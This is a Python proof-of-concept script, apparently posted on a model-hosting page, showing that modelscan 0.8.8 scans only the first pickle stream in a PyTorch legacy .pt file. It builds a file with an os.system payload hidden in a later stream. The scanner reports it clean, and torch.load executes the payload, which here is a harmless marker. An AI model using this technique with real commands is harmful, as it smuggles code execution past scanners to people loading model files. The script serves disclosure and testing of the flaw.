cmpndry's picture
Upload 3 files
4cbb7df verified
Raw
History Blame Contribute Delete
2.37 kB
#!/usr/bin/env python3
"""Self-contained PoC: modelscan 0.8.8 inspects only the first of multiple sequential
pickle streams in a PyTorch legacy .pt, reporting a malicious file as clean while
torch.load(weights_only=False) executes the payload.
Requires: modelscan==0.8.8, torch. Run: python poc.py
Payload is a benign marker (touch MP_legacy_pwn); no network, no destructive action.
"""
import os, sys, pickle, subprocess
MAGIC = 0x1950a86a20f9469cfc6c # PyTorch legacy magic number
def build_multi(path):
# Valid legacy layout torch._legacy_load expects: magic, protocol, sys_info,
# main object (payload here), then deserialized storage keys (empty -> no
# trailing storage data). The empty-keys stream makes torch.load() return
# cleanly WITHOUT EOFError, so this is a well-formed file, not a malformed one.
class Payload:
def __reduce__(self):
return (os.system, ("touch MP_legacy_pwn",))
streams = [pickle.dumps(MAGIC), pickle.dumps(1001), pickle.dumps({}),
pickle.dumps(Payload()), pickle.dumps([])]
with open(path, "wb") as f:
f.write(b"".join(streams))
def build_single(path):
class Ctl: # same operator, single stream (control)
def __reduce__(self):
return (os.system, ("true",))
with open(path, "wb") as f:
f.write(pickle.dumps(Ctl()))
def scan(path):
r = subprocess.run(["modelscan", "-p", path], capture_output=True, text=True)
return r.stdout + r.stderr
build_multi("evil_legacy.pt")
multi_clean = "No issues found" in scan("evil_legacy.pt")
if os.path.exists("MP_legacy_pwn"):
os.remove("MP_legacy_pwn")
import torch
load_ok = False
try:
torch.load("evil_legacy.pt", weights_only=False)
load_ok = True # well-formed file: loads without error
except Exception:
pass
executed = os.path.exists("MP_legacy_pwn")
build_single("evil_single.pkl")
single_flagged = "system" in scan("evil_single.pkl").lower()
print("multi-stream .pt scan clean :", multi_clean)
print("torch.load completed cleanly:", load_ok)
print("loader executed payload :", executed)
print("single-stream control flagged:", single_flagged)
ok = multi_clean and load_ok and executed and single_flagged
print("RESULT:", "PASS - scanner bypass confirmed" if ok else "FAIL")
sys.exit(0 if ok else 1)